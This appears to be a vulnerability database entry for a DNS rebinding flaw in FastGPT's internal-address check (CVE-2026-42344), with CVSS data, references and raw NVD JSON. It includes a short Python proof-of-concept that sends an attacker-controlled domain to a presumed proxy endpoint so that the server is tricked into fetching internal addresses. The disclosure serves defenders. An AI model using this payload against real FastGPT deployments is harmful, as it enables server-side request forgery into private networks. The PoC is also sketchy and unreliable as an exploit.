CVE-2026-42344

Description

FastGPT is an AI Agent building platform. In versions 4.14.11 and prior, FastGPT's isInternalAddress() function in packages/service/common/system/utils.ts is vulnerable to DNS rebinding (TOCTOU — Time-of-Check to Time-of-Use). The function resolves the hostname via dns.resolve4()/dns.resolve6() and checks resolved IPs against private ranges, but the actual HTTP request happens in a separate call with a new DNS resolution, allowing the DNS record to change between validation and fetch. At time of publication, there are no publicly available patches.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

FastGPT <= 4.14.11

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL (Vulnerable FastGPT instance)
target_url = "http://vulnerable-fastgpt-instance/api/proxy"

# Attacker controlled domain pointing to a malicious DNS server
# The DNS server is configured to return a public IP (e.g. 1.1.1.1) first, 
# then a private IP (e.g. 127.0.0.1) on subsequent queries (TTL=0).
attacker_domain = "attacker-controlled-domain.com"

payload = {
    "url": f"http://{attacker_domain}/sensitive-path"
}

try:
    print(f"Sending request to {target_url} with payload: {payload}")
    response = requests.post(target_url, json=payload, timeout=10)
    print(f"Response Status: {response.status_code}")
    print(f"Response Body: {response.text}")
except Exception as e:
    print(f"Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-42344
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-42344
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-42344/
[4] VulDB https://vuldb.com/cve/CVE-2026-42344
[5] https://github.com/labring/FastGPT/security/advisories/GHSA-cc8x-jrqv-hmwh
[6] https://github.com/labring/FastGPT/security/advisories/GHSA-cc8x-jrqv-hmwh

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-42344", "sourceIdentifier": "[email protected]", "published": "2026-05-08T23:16:37.177", "lastModified": "2026-05-11T19:16:23.907", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "FastGPT is an AI Agent building platform. In versions 4.14.11 and prior, FastGPT's isInternalAddress() function in packages/service/common/system/utils.ts is vulnerable to DNS rebinding (TOCTOU — Time-of-Check to Time-of-Use). The function resolves the hostname via dns.resolve4()/dns.resolve6() and checks resolved IPs against private ranges, but the actual HTTP request happens in a separate call with a new DNS resolution, allowing the DNS record to change between validation and fetch. At time of publication, there are no publicly available patches."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-367"}]}], "references": [{"url": "https://github.com/labring/FastGPT/security/advisories/GHSA-cc8x-jrqv-hmwh", "source": "[email protected]"}, {"url": "https://github.com/labring/FastGPT/security/advisories/GHSA-cc8x-jrqv-hmwh", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}